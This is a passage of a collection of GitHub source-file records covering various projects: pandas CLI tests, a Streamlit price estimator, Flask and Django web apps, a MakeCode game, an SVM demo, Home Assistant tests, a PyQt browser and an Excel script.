orderlist)","repo_name":"TauWu/template_crawler","sub_path":"do/reporter.py","file_name":"reporter.py","file_ext":"py","file_size_in_byte":6544,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"36"}
+{"seq_id":"74365883622","text":"import data_frame_cli as cli\nimport pandas as pd\nimport numpy as np\n\ndef test_print_shape(capsys):\n\n expected_out = ['df.shape', 'test.csv', '(5, 2)']\n\n cli.print_shape('test.csv', pd.DataFrame(np.random.randn(5, 2)))\n captured = capsys.readouterr()\n result = captured.out\n\n for element in expected_out:\n assert element in result\n\ndef test_print_info(capsys):\n\n expected_out = ['df.info', '5 non-null', 'int']\n\n cli.print_info(True, pd.DataFrame(np.random.randint(0, 10, size=(5, 2)),\n columns=['col_a', 'col_b']))\n captured = capsys.readouterr()\n result = captured.out\n\n for element in expected_out:\n assert element in result\n\ndef test_print_head(capsys):\n\n expected_out = ['df.head', '10', '40']\n\n cli.print_head(True, pd.DataFrame(data=[[10, 20], [30, 40]], \n columns=['col_a', 'col_b']))\n captured = capsys.readouterr()\n result = captured.out\n\n for element in expected_out:\n assert element in result\n\ndef test_print_describe_none_column(capsys):\n\n expected_out = ['describe', 'bla not found']\n\n cli.print_describe('bla', pd.DataFrame(data=[[10, 20], [30, 40]], \n columns=['col_a', 'col_b']))\n captured = capsys.readouterr()\n result = captured.out\n\n for element in expected_out:\n assert element in result","repo_name":"ryanwbaker/ensf311-a3-data-frame-cli","sub_path":"data_frame_cli_test.py","file_name":"data_frame_cli_test.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"1189954750","text":"from __future__ import annotations\n\nimport pandas as pd\nimport streamlit as st\n\nfrom helpers import Data, Model, Scraper\n\nst.set_page_config(page_title='Real estate price estimation')\n\nst.write('Find out what a place would be worth?')\n\n# Setting up the session_state variables\nif 'scraper' not in st.session_state:\n st.session_state['scraper'] = Scraper()\n\nif 'model' not in st.session_state:\n st.session_state['model'] = Model.load_lgbm_pricing_model()\n\nscraper = st.session_state['scraper']\n\n# Searching for the desired place\nst.text_input(label='', value='78 avenue Raymond Poincaré', key='place')\nscraper.type_search(st.session_state['place'])\nscraper.search_place_with_url(scraper.get_suggestions()[0])\n\n# Retrieving the coordinates of the desired place\nlatitude, longitude = scraper.get_coordinates()\n\n# Load the data\nif 'df' not in st.session_state:\n # st.session_state['df'] = Data.load_df(explode=False)\n st.session_state['df'] = Data.load_data_for_lgbm()\n\n# Calculating the distance\ndf_distance = st.session_state['df'].pipe(Data.calculate_distance, latitude=latitude, longitude=longitude)\nmodel_data = df_distance.loc[[df_distance['distance'].argmin()], :].head(1).reset_index(drop=True)\n\n\ncolumns = st.columns(3)\n# Adding a metric with the price predictions for now\nwith columns[0]:\n current_price = st.session_state['model'].predict(model_data)[0]\n st.metric(label='Current price',\n value=f\"{current_price:,.{2}f} €\")\n# Adding a metric with the price predictions for in five years\nwith columns[1]:\n model_data_in_five_years = model_data.copy()\n model_data_in_five_years.loc[0, 'anneemut'] += 5\n price_in_five_years = st.session_state['model'].predict(model_data_in_five_years)[0]\n st.metric(label='Price in five years',\n value=f\"{price_in_five_years:,.{2}f} €\",\n delta=f'{(((price_in_five_years / current_price) - 1) * 100):,.{2}f} %')\n# Adding a metric with the money amount that could be expected if one invested current_price in an ECB bond\nwith columns[2]:\n ecb_five_year_equivalent = current_price * (1.02312) ** 5\n st.metric(label='ECB bond equivalent',\n value=f\"{ecb_five_year_equivalent:,.{2}f} €\",\n delta=f'{(((ecb_five_year_equivalent / current_price) - 1) * 100):,.{2}f} %')\n\n# Drawing the map\nst.map(pd.DataFrame({'lat': [latitude], 'lon': [longitude]}))\n","repo_name":"acktan/eleven-strategy","sub_path":"paris_pricer/Home.py","file_name":"Home.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"6621904027","text":"from flask import Flask,render_template,request,jsonify\nimport random\nfrom dicionario import conveersao,dividir_distancias,dic\nfrom tempera import iniciarr\nfrom subidaencosta import iniciar\nfrom subidaencosta2 import iniciars\nfrom ag_pcv import ag\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef index():\n \n return render_template(\"index.html\")\n\n@app.route(\"/\", methods=['POST'])\ndef post():\n #barrinha = request.form['barrinha']\n #print(barrinha)\n tp = request.form['tp']\n ng = request.form['ng']\n tc = request.form['tc']\n tm = request.form['tm']\n ig = request.form['ig']\n distanciaentre = request.form['distanciasi']\n nomes = request.form['nome']\n latitude = request.form['latitudelongitude']\n \n \n nome,numero,latitudee = conveersao(distanciaentre,nomes,latitude)\n\n n = dividir_distancias(numero)\n print(len(n))\n sequencia_atual = list(range(len(n)))\n random.shuffle(sequencia_atual)\n #cursoencosta,distanciaencosta,lat = iniciar(n,nome,latitudee,sequencia_atual)\n #cursoencosta2,distanciaencosta2,lat2 = iniciars(n,nome,latitudee,sequencia_atual)\n #cursotempera,distanciatempera,lon = iniciarr(n,nome,latitudee,sequencia_atual)\n p,lat = ag(n,len(n),int(tp),int(ng),float(tc),float(tm),float(ig),latitudee)\n print(p)\n print(lat)\n #for i in range(len(lat)):\n # muda = lat[i].replace(\",\",\"/\")\n # lat[i] = muda\n #for i in range(len(lon)):\n # muda = lon[i].replace(\",\",\"/\")\n # lon[i] = muda\n #for i in range(len(lat2)):\n # muda = lat2[i].replace(\",\",\"/\")\n # lat2[i] = muda\n \n return render_template(\"index.html\",distanciaencosta = p,lat=lat)\n #if barrinha==\"se\":\n # return render_template(\"index.html\",distanciaencosta =\"\\n Distancia Subida de Encosta:\"+str(distanciaencosta),cursoencosta =\"Curso Subida de encosta:\" +str(cursoencosta),lat=lat)\n #elif barrinha == \"se*\":\n # return render_template(\"index.html\",distanciaencosta2 =\"\\n Distancia Subida de Encosta*:\"+str(distanciaencosta2),cursoencosta2 =\"Curso Subida de encosta*:\" +str(cursoencosta2),lat2=lat2)\n #elif barrinha ==\"temp\":\n # return render_template(\"index.html\", distanciatempera = \"\\n Distancia Tempera:\"+str(distanciatempera),cursotempera =\"\\n Curso Tempera:\"+str(cursotempera),long = lon)\n #elif barrinha ==\"todas\":\n # return render_template(\"index.html\",distanciaencosta =\"\\n Distancia Subida de Encosta:\"+str(distanciaencosta),cursoencosta =\"Curso Subida de encosta:\" +str(cursoencosta),lat=lat,cursotempera = \"\\n Curso Tempera:\"+str(cursotempera),distanciatempera=\"\\n Distancia tempera:\"+str(distanciatempera),long = lon,distanciaencosta2 =\"\\n Distancia Subida de Encosta*:\"+str(distanciaencosta2),cursoencosta2 =\"Curso Subida de encosta*:\" +str(cursoencosta2),lat2=lat2)\n\n \n \nif __name__ == \"__main__\":\n app.run()\n\n\n\n\n","repo_name":"Igao2/BarRoute","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"36516820753","text":"import logging\n\nimport sbs.database_utility as db_util\nfrom sbs.models.TxMethod import TxMethod\nfrom sbs.utility import log_level\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(log_level)\n\n\ndef add_tx_method(params):\n \"\"\"\n Adds tx_method record or returns tx_method record if already exists\n \"\"\"\n method_name = params['tx_method']\n try:\n tx_method = TxMethod.query.filter_by(method_name=method_name) \\\n .one_or_none()\n\n if tx_method:\n logger.info(\"TxMethod with method name [{}] already exists.\"\n .format(method_name))\n return tx_method\n\n tx_method = TxMethod(method_name)\n db_util.db_add_query(tx_method)\n db_util.db_commit()\n logger.info(\"Transformation method record for method {} added successfully.\"\n .format(method_name))\n tx_method = TxMethod.query.filter_by(method_name=method_name) \\\n .one_or_none()\n except Exception as e:\n logger.error('An error occurred : {}'.format(str(e)))\n raise Exception('Failed to fetch Transformation method id for method '\n '[{}] with error {} '.format(method_name, e))\n\n return tx_method\n","repo_name":"rohitbs113/DupontSBS","sub_path":"sbs/service/tx_method_service.py","file_name":"tx_method_service.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"2281427634","text":"@namespace\nclass SpriteKind:\n Gas = SpriteKind.create()\n\ndef on_a_pressed():\n global darts, projectile\n darts = [assets.image(\"\"\"\n Dart1\n \"\"\"),\n assets.image(\"\"\"\n Dart2\n \"\"\"),\n img(\"\"\"\n . . 1 1 . . \n . . 1 1 . . \n 5 1 1 1 1 5 \n 5 5 5 5 5 5 \n . . 5 5 . . \n . 5 . . 5 .\n \"\"\"),\n img(\"\"\"\n . . 1 1 . . \n . . 1 1 . . \n 7 1 1 1 1 7 \n 7 7 7 7 7 7 \n . . 7 7 . . \n . 7 . . 7 .\n \"\"\"),\n img(\"\"\"\n . . 1 1 . . \n . . 1 1 . . \n 9 1 1 1 1 9 \n 9 9 9 9 9 9 \n . . 9 9 . . \n . 9 . . 9 .\n \"\"\"),\n img(\"\"\"\n . . 1 1 . . \n . . 1 1 . . \n a 1 1 1 1 a \n a a a a a a \n . . a a . . \n . a . . a .\n \"\"\")]\n projectile = sprites.create_projectile_from_sprite(darts._pick_random(), mySprite, 0, -150)\n projectile.start_effect(effects.warm_radial, 100)\ncontroller.A.on_event(ControllerButtonEvent.PRESSED, on_a_pressed)\n\ndef on_on_overlap(sprite, otherSprite):\n global enemySpeed\n sprite.destroy(effects.disintegrate, 500)\n otherSprite.destroy()\n info.change_score_by(1)\n if info.score() == 5:\n game.show_long_text(\"Ship Intercom: We forgot to tell you, your projectiles steal data from the ships before destroying them. And also, please don't get hit too many times, these ships are really expensive.\",\n DialogLayout.BOTTOM)\n if info.score() == 10:\n info.change_score_by(5)\n mySprite.say_text(\"+5 Level-Up Bonus\", 2000, False)\n statusbar2.value = 100\n enemySpeed = 70\n elif info.score() == 25:\n info.change_score_by(5)\n mySprite.say_text(\"+5 Level-Up Bonus\", 2000, False)\n statusbar2.value = 100\n enemySpeed = 90\n elif info.score() == 40:\n game.show_long_text(\"Congrats soldier, you saved the galaxy. Accept this reward of $700,000,000!\",\n DialogLayout.BOTTOM)\n info.change_score_by(700000000)\n game.over(True)\nsprites.on_overlap(SpriteKind.enemy, SpriteKind.projectile, on_on_overlap)\n\ndef on_on_zero(status):\n game.show_long_text(\"Ship Intercom: Come in soldier... soldier? I TOLD HIM THESE ARE EXPENSIVE AS CRAP.\",\n DialogLayout.BOTTOM)\n game.over(False)\nstatusbars.on_zero(StatusBarKind.health, on_on_zero)\n\ndef on_on_overlap2(sprite2, otherSprite2):\n statusbar.value = 100\n otherSprite2.destroy()\nsprites.on_overlap(SpriteKind.player, SpriteKind.Gas, on_on_overlap2)\n\ndef on_on_zero2(status2):\n game.show_long_text(\"Ship Intercom: *slaps face* You needed to grab the fuel. COME ON!\",\n DialogLayout.BOTTOM)\n game.over(False)\nstatusbars.on_zero(StatusBarKind.energy, on_on_zero2)\n\ndef on_on_overlap3(sprite3, otherSprite3):\n statusbar2.value += -20\n otherSprite3.destroy(effects.fire, 500)\n scene.camera_shake(4, 500)\nsprites.on_overlap(SpriteKind.player, SpriteKind.enemy, on_on_overlap3)\n\nmyEnemy: Sprite = None\nmyFuel: Sprite = None\nprojectile: Sprite = None\ndarts: List[Image] = []\nstatusbar2: StatusBarSprite = None\nenemySpeed = 0\nstatusbar: StatusBarSprite = None\nmySprite: Sprite = None\ngame.splash(\"You feel a strange, cold breeze, and you are suddenly awoken by the President.\")\ngame.show_long_text(\"Mr. President: Hello, you've been selected to fight evil in the galaxy. 
Complete this mission for the chance to earn $700,000,000.\",\n DialogLayout.BOTTOM)\nscene.set_background_image(assets.image(\"\"\"\n Galaxy\n\"\"\"))\nscroller.scroll_background_with_speed(0, 10)\nmySprite = sprites.create(assets.image(\"\"\"\n Rocket\n\"\"\"), SpriteKind.player)\ncontroller.move_sprite(mySprite)\nmySprite.set_stay_in_screen(True)\nanimation.run_image_animation(mySprite,\n assets.animation(\"\"\"\n Flying Rocket\n \"\"\"),\n 100,\n True)\nstatusbar = statusbars.create(20, 4, StatusBarKind.energy)\nstatusbar.attach_to_sprite(mySprite, -30, 0)\nenemySpeed = 50\nstatusbar2 = statusbars.create(4, 20, StatusBarKind.health)\nstatusbar2.attach_to_sprite(mySprite, 0, 0)\nstatusbar.set_label(\"Gas\")\nstatusbar2.set_label(\"HP\")\n\ndef on_update_interval():\n global myFuel\n myFuel = sprites.create_projectile_from_side(assets.image(\"\"\"\n Fuel\n \"\"\"), 0, 80)\n myFuel.x = randint(5, 155)\n myFuel.set_kind(SpriteKind.Gas)\ngame.on_update_interval(5000, on_update_interval)\n\ndef on_update_interval2():\n global myEnemy\n myEnemy = sprites.create_projectile_from_side(assets.image(\"\"\"\n Spider\n \"\"\"), 0, enemySpeed)\n myEnemy.x = randint(5, 155)\n myEnemy.set_kind(SpriteKind.enemy)\n animation.run_image_animation(myEnemy,\n assets.animation(\"\"\"\n Flying Spider\n \"\"\"),\n 100,\n True)\ngame.on_update_interval(2000, on_update_interval2)\n\ndef on_update_interval3():\n statusbar.value += -1\ngame.on_update_interval(500, on_update_interval3)","repo_name":"pythongamerexe/space-wars","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5165,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"}
+{"seq_id":"23621832376","text":"#!/usr/bin/env python3\n\"\"\" module \"\"\"\nimport numpy as np\n\n\ndef play(env, Q, max_steps=100):\n \"\"\"trained agent play an episode\"\"\"\n env.reset()\n state = 0\n env.render()\n for i in range(max_steps):\n action = np.argmax(Q[state, :])\n state, reward, done, _ = env.step(action)\n env.render()\n if done:\n break\n return reward\n","repo_name":"vandeldiegoc/holbertonschool-machine_learning","sub_path":"reinforcement_learning/0x00-q_learning/4-play.py","file_name":"4-play.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"29543563501","text":"import time\n\n\nsessions = {}\n\n\ndef find_or_create_session(id_):\n \"\"\"\n This function returns the client session with Wit context included if one\n exists, or it returns a newly created session\n\n :param id_: A Facebook ID\n :return: str\n \"\"\"\n new_session = False\n session_id = \"\"\n\n # search the global sessions for the given Facebook ID\n for key in sessions.iterkeys():\n if sessions[key][\"id\"] == id_:\n session_id += key\n\n # if no session exists, let's create one\n if session_id is \"\":\n new_session = True\n # the session is created by taking th current epoch time in seconds,\n # and concatenating the given Facebook ID\n session_id += str(int(time.time())) + id_\n sessions[session_id] = {\n \"id\": id_,\n \"context\": {}\n }\n\n return session_id, new_session\n\n\ndef main():\n pass\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"harrylewis/travel-assistant-bot","sub_path":"sessions.py","file_name":"sessions.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"15317573724","text":"from django.contrib.auth.decorators import login_required\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.decorators.http import require_GET, require_POST\n\nfrom glass.forms import UserForm, TopicForm, MessageForm\nfrom glass.models import User, Tag, Topic, Message\n\n@require_GET\ndef index(request):\n \"\"\"\n Index page of the project.\n\n The page presents list of popular topics ordered by default by number of\n “likes”. Pagination, search.\n \"\"\"\n page_size = request.GET.get('page_size', 5)\n page = request.GET.get('page', 1)\n tag = request.GET.get('tag')\n search = request.GET.get('search')\n tm = Topic.objects\n topics = tm.filter(tags__in=[tag]) if tag else tm.all()\n if search:\n topics = topics.filter(title__contains=search)\n # FIXME The following processing logic assumes that relatively small\n # (maybe a few hundreds) number of topics is returned by ‘topic’ query\n # set. This may be *quite* slow if the data base contains lots of\n # topics. If this is the case, we could add ‘initial_message’ foreign\n # key field to ‘Topic’ model and use it to sort topics on data base\n # level. Other solutions would involve lower level of interaction with\n # the data base and thus may lock the application into using of\n # particular back-end, which is often bad design.\n topics = sorted(list(topics),\n key=lambda x: x.initial_message().likes(),\n reverse=True)\n context = {}\n if topics:\n paginator = Paginator(topics, page_size)\n num_pages = paginator.num_pages\n try:\n p = paginator.page(page)\n except PageNotAnInteger:\n contacts = paginator.page(1)\n except EmptyPage:\n p = paginator.page(num_pages)\n context['page'] = p\n # Range of page links to show, we should take care of situations\n # when there are too many pages:\n page_range = range(max(1, p.number - 4),\n min(num_pages, p.number + 4) + 1)\n context['page_range'] = page_range\n context['num_pages'] = num_pages\n else:\n context['page'] = None\n return render(request, 'glass/index.html', context=context)\n\ndef about(request):\n \"\"\"\n About page, nothing special.\n \"\"\"\n return render(request, 'glass/about.html')\n\ndef topic(request, slug):\n \"\"\"\n Topic-dedicated page.\n\n This displays all messages in order and allows registered users to post\n new messages. This page features anchor links per message and ability to\n edit or delete last posted message for its author. 
Messages can be\n “liked” too and this is reversible.\n \"\"\"\n topic = get_object_or_404(Topic, slug=slug)\n messages = Message.objects.filter(topic=topic)\n context = {'topic': topic,\n 'form': MessageForm(),\n 'messages': messages}\n if request.user.is_authenticated():\n if request.method == 'POST':\n msg_form = MessageForm(request.POST)\n if msg_form.is_valid():\n message = msg_form.save(commit=False)\n message.author = request.user\n message.topic = topic\n message.save()\n msg_form.save_m2m()\n return redirect('topic', slug=slug)\n else:\n context['form'] = msg_form # render errors\n return render(request, 'glass/topic.html', context)\n\n@login_required\ndef new_topic(request):\n \"\"\"\n Creation of new topics.\n\n This is mainly about processing of ‘TopicForm’ and ‘MessageForm’, since\n every topic must have initial message.\n \"\"\"\n if request.method == 'GET':\n context = {'topic_form': TopicForm(prefix='topic'),\n 'msg_form': MessageForm(prefix='msg')}\n elif request.method == 'POST':\n topic_form = TopicForm(request.POST, prefix='topic')\n msg_form = MessageForm(request.POST, prefix='msg')\n context = {'topic_form': topic_form,\n 'msg_form': msg_form}\n if topic_form.is_valid():\n new_topic = topic_form.save()\n if msg_form.is_valid():\n new_msg = msg_form.save(commit=False)\n new_msg.author = request.user\n new_msg.topic = new_topic\n new_msg.save()\n msg_form.save_m2m()\n return redirect('topic', slug=new_topic.slug)\n return render(request, 'glass/new-topic.html', context=context)\n\n@login_required\ndef user(request, username):\n \"\"\"\n User profile.\n\n Every registered user can see all profiles, but only his own profile is\n editable for him. This page also displays latest messages authored by\n the user.\n \"\"\"\n user = get_object_or_404(User, username=username)\n latest_msgs = Message.objects.filter(author=user).order_by('-id')[:5]\n context = {'this_user': user, 'latest_msgs': latest_msgs}\n if request.user == user:\n if request.method == 'GET':\n context['form'] = UserForm(instance=user)\n elif request.method == 'POST':\n form = UserForm(request.POST, instance=user)\n if form.is_valid():\n form.save()\n else: # if form is invalid, render it to show messages\n context['form'] = form\n return render(request, 'glass/user.html', context=context)\n\ndef carefully_get_msg(request):\n \"\"\"\n Return message according to parameters in ‘request’ or ‘None’. Request\n should contain parameter named ‘msg_id’ identifying the message.\n \"\"\"\n user = request.user\n if not user.is_authenticated():\n return None\n msg_id = request.GET.get('msg_id')\n if not msg_id:\n return None\n try:\n msg = Message.objects.get(id=msg_id)\n except Message.DoesNotExist:\n return None\n return msg\n\n@require_GET\ndef msg_like(request):\n \"\"\"\n This is how users can like messages.\n\n Invoked by Java Script from topic page.\n \"\"\"\n msg = carefully_get_msg(request)\n if not msg:\n return HttpResponse('0')\n if msg.likers.filter(username=request.user.username).exists():\n msg.likers.remove(request.user)\n else:\n msg.likers.add(request.user)\n msg.save()\n return HttpResponse(str(msg.likes()))\n\n@require_GET\ndef msg_del(request):\n \"\"\"\n Deletion of message.\n\n Quite obviously, it deletes messages. Only last message in thread can be\n deleted and only by its author. 
Staff can delete everything, of course.\n \"\"\"\n msg = carefully_get_msg(request)\n topic = msg.topic\n if not msg or not msg.editable_by(request.user):\n return HttpResponse('')\n msg.delete()\n # if this is the single message in topic, delete topic:\n if not Message.objects.filter(topic=topic).exists():\n topic.delete()\n return HttpResponse(\"deleted\")\n","repo_name":"mrkkrp/glass","sub_path":"glass/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7082,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"}
+{"seq_id":"15500299977","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import datasets\nfrom sklearn.preprocessing import PolynomialFeatures, StandardScaler\nfrom sklearn.svm import LinearSVC\nfrom sklearn.pipeline import Pipeline\nfrom LogisticRegression.drawDecisionBoundary import plot_decision_boundary\nfrom sklearn.svm import SVC\n\n\ndef PolynomiaSVC(degree, C=1.0):\n return Pipeline([\n ('poly', PolynomialFeatures(degree=degree)),\n ('std_scaler', StandardScaler()),\n ('linearSVC', LinearSVC(C=C))\n ])\n\ndef PolynomialKernelSVC(degree, C=1.0):\n return Pipeline([\n ('std_scaler', StandardScaler()),\n ('kernelSVC', SVC(kernel='poly', degree=degree, C=C))\n ])\n\nif __name__ == \"__main__\":\n\n # 使用skleran生成数据\n X, y = datasets.make_moons(noise=0.15, random_state=666)\n\n # 绘制数据集图像\n plt.scatter(X[y==0, 0], X[y==0, 1])\n plt.scatter(X[y==1, 0], X[y==1, 1])\n plt.show()\n\n # 使用多项式特征的SVM\n poly_svc = PolynomiaSVC(degree=3)\n poly_svc.fit(X, y)\n\n # 绘制决策边界\n plot_decision_boundary(poly_svc, axis=[-1.5, 2.5, -1.0, 1.5])\n plt.scatter(X[y==0, 0], X[y==0, 1])\n plt.scatter(X[y==1, 0], X[y==1, 1])\n plt.show()\n\n # 使用多项式核函数的SVM\n poly_kernel_svc = PolynomiaSVC(degree=3)\n poly_kernel_svc.fit(X, y)\n\n # 绘制决策边界\n plot_decision_boundary(poly_kernel_svc, axis=[-1.5, 2.5, -1.0, 1.5])\n plt.scatter(X[y==0, 0], X[y==0, 1])\n plt.scatter(X[y==1, 0], X[y==1, 1])\n plt.show()","repo_name":"ediltwwj/MachinelLearning","sub_path":"SVM/sklearnSvm2.py","file_name":"sklearnSvm2.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"9052856933","text":"\"\"\"MasterTherm Sensor Tests.\"\"\"\nfrom unittest.mock import patch\nimport pytest\n\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.const import Platform, UnitOfTemperature\n\nfrom pytest_homeassistant_custom_component.common import MockConfigEntry\nfrom custom_components.mastertherm.const import (\n DOMAIN,\n MasterthermSensorEntityDescription,\n)\n\nfrom .conftest import APIMock\n\n\n@pytest.fixture(autouse=True)\ndef override_entity():\n \"\"\"Override the ENTITIES to test Sensors.\"\"\"\n with patch(\n \"custom_components.mastertherm.ENTITIES\",\n {MasterthermSensorEntityDescription.__name__: Platform.SENSOR},\n ), patch(\n \"custom_components.mastertherm.coordinator.ENTITIES\",\n {MasterthermSensorEntityDescription.__name__: Platform.SENSOR},\n ):\n yield\n\n\nasync def test_sensor_setup(\n hass: HomeAssistant,\n mock_configdata: dict,\n):\n \"\"\"Test Sensors are Created and Updated.\"\"\"\n # Setting up using Mock requires the actual config not the Domain\n # changed the way the test works to send without domain.\n api_mock = APIMock()\n entry = MockConfigEntry(domain=DOMAIN, data=mock_configdata[DOMAIN])\n entry.add_to_hass(hass)\n\n with patch(\n \"custom_components.mastertherm.config_flow.authenticate\",\n return_value={\"status\": \"success\"},\n ), patch(\n \"custom_components.mastertherm.coordinator.MasterthermController.connect\",\n side_effect=api_mock.connect,\n ), patch(\n \"custom_components.mastertherm.coordinator.MasterthermController.refresh\",\n side_effect=api_mock.refresh,\n ), patch(\n \"custom_components.mastertherm.coordinator.MasterthermController.get_devices\",\n side_effect=api_mock.get_devices,\n ), patch(\n \"custom_components.mastertherm.coordinator.MasterthermController.get_device_data\",\n side_effect=api_mock.get_device_data,\n ):\n await hass.config_entries.async_setup(entry.entry_id)\n await hass.async_block_till_done()\n\n # Check we called the Mock and we have a Sensor.\n assert (\n hass.states.async_entity_ids_count(Platform.SENSOR) > 0\n ), \"Sensors Failed to Create\"\n\n # Check the Temperature Sensor\n state = hass.states.get(\"sensor.mt_1234_1_outside_temp\")\n assert state.state == \"4.9\"\n assert state.name == \"Outside Temperature\"\n assert state.attributes.get(\"unit_of_measurement\") == UnitOfTemperature.CELSIUS\n","repo_name":"sHedC/homeassistant-mastertherm","sub_path":"tests/test_sensor.py","file_name":"test_sensor.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"36"}
+{"seq_id":"19725361992","text":"\"\"\"\n \t*************************** \n \t--------EveIDE_LIGHT-------- \n \t Author: Adancurusul\n \t Date: 2021-07-12 10:28:27\n \t LastEditors: Adancurusul\n \t LastEditTime: 2021-07-31 14:08:36\n \t Github: https://github.com/Adancurusul\n \t Email: adancurusul@gmail.com\n\n \t***************************\n \"\"\"\nimport sys\nfrom qtpy.QtCore import Qt, QUrl\nfrom qtpy.QtGui import QIcon\nfrom qtpy.QtWebEngineWidgets import QWebEngineView\nfrom qtpy.QtWidgets import QApplication, QWidget, QPushButton, QLineEdit, QVBoxLayout, QHBoxLayout\n\n\nclass Demo(QWidget):\n def __init__(self):\n super(Demo, self).__init__()\n self.resize(1000, 600)\n\n self.back_btn = QPushButton(self)\n self.forward_btn = QPushButton(self)\n self.refresh_btn = QPushButton(self)\n self.zoom_in_btn = QPushButton(self)\n self.zoom_out_btn = QPushButton(self)\n self.url_le = QLineEdit(self)\n\n self.browser = QWebEngineView()\n \n self.h_layout = QHBoxLayout()\n self.v_layout = QVBoxLayout()\n\n self.layout_init()\n self.btn_init()\n self.le_init()\n self.browser_init()\n\n def layout_init(self):\n self.h_layout.setSpacing(0)\n self.h_layout.addWidget(self.back_btn)\n self.h_layout.addWidget(self.forward_btn)\n self.h_layout.addWidget(self.refresh_btn)\n self.h_layout.addStretch(2)\n self.h_layout.addWidget(self.url_le)\n self.h_layout.addStretch(2)\n self.h_layout.addWidget(self.zoom_in_btn)\n self.h_layout.addWidget(self.zoom_out_btn)\n\n self.v_layout.addLayout(self.h_layout)\n self.v_layout.addWidget(self.browser)\n\n self.setLayout(self.v_layout)\n\n def browser_init(self):\n self.browser.load(QUrl('https://baidu.com'))\n self.browser.urlChanged.connect(lambda: self.url_le.setText(self.browser.url().toDisplayString()))\n\n def btn_init(self):\n self.back_btn.setIcon(QIcon('images/back.png'))\n self.forward_btn.setIcon(QIcon('images/forward.png'))\n self.refresh_btn.setIcon(QIcon('images/refresh.png'))\n self.zoom_in_btn.setIcon(QIcon('images/zoom_in.png'))\n self.zoom_out_btn.setIcon(QIcon('images/zoom_out.png'))\n\n self.back_btn.clicked.connect(self.browser.back)\n self.forward_btn.clicked.connect(self.browser.forward)\n self.refresh_btn.clicked.connect(self.browser.reload)\n self.zoom_in_btn.clicked.connect(self.zoom_in_func)\n self.zoom_out_btn.clicked.connect(self.zoom_out_func)\n\n def le_init(self):\n self.url_le.setFixedWidth(400)\n self.url_le.setPlaceholderText('Search or enter website name')\n\n def keyPressEvent(self, QKeyEvent):\n if QKeyEvent.key() == Qt.Key_Return or QKeyEvent.key() == Qt.Key_Enter:\n if self.url_le.hasFocus():\n if self.url_le.text().startswith('https://') or self.url_le.text().startswith('http://'):\n self.browser.load(QUrl(self.url_le.text()))\n else:\n self.browser.load(QUrl('https://'+self.url_le.text()))\n\n def zoom_in_func(self):\n self.browser.setZoomFactor(self.browser.zoomFactor()+0.1)\n\n def zoom_out_func(self):\n self.browser.setZoomFactor(self.browser.zoomFactor()-0.1)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n demo = Demo()\n demo.show()\n sys.exit(app.exec_())","repo_name":"Adancurusul/EveIDE_LIGHT","sub_path":"source/webWidget.py","file_name":"webWidget.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"36"}
+{"seq_id":"34346025720","text":"#coding=utf-8\n\n# 查找不存在的商家编码\nimport sys\nimport openpyxl\nimport os\nimport user_input\nimport merge_sheet\nimport present\n\nif __name__ == \"__main__\":\n present.use_des()\n print(\"开始处理\\n\")\n\n wb = merge_sheet.load_spec_file(user_input.file_name_original)\n\n # 输出数据的sheet名\n output_sheet_name = \"不存在的商家编码\"\n\n all_sheet_name = wb.get_sheet_names()\n output_sheet = None\n if output_sheet_name not in all_sheet_name:\n print(\"%s不存在, 创建它\" % (output_sheet_name))\n output_sheet = wb.create_sheet(output_sheet_name)\n else:\n print(\"%s已经存在, 先删除它, 再创建它\" % (output_sheet_name))\n wb.remove_sheet(wb[output_sheet_name])\n output_sheet = wb.create_sheet(output_sheet_name)\n\n \"\"\"\n print(\"%s已经存在\" % (output_sheet_name))\n output_sheet = wb[output_sheet_name]\n \"\"\"\n\n # 计算出所有的商家编码\n all_business_no = {}\n cells = merge_sheet.cal_column_cell(wb[\"Sheet2\"], \"j\", 2)\n for cell in cells:\n if cell.value not in all_business_no:\n all_business_no[cell.value] = 1\n all_business_no = all_business_no.keys()\n # print(\"\\n\\nall_business_no = %r\\n\\n\" % (all_business_no))\n\n # 计算出当前存在的商家编码\n existent_business_no = {}\n cells = merge_sheet.cal_column_cell(wb[\"Sheet4\"], \"a\", 2)\n for cell in cells:\n if cell.value not in existent_business_no:\n existent_business_no[cell.value] = 1\n existent_business_no = existent_business_no.keys()\n # print(\"\\n\\nexistent_business_no = %r\\n\\n\" % (existent_business_no))\n\n # 计算出不存在的商家编码\n inexistent_business_no = {}\n for value in all_business_no:\n if value not in existent_business_no:\n if value not in 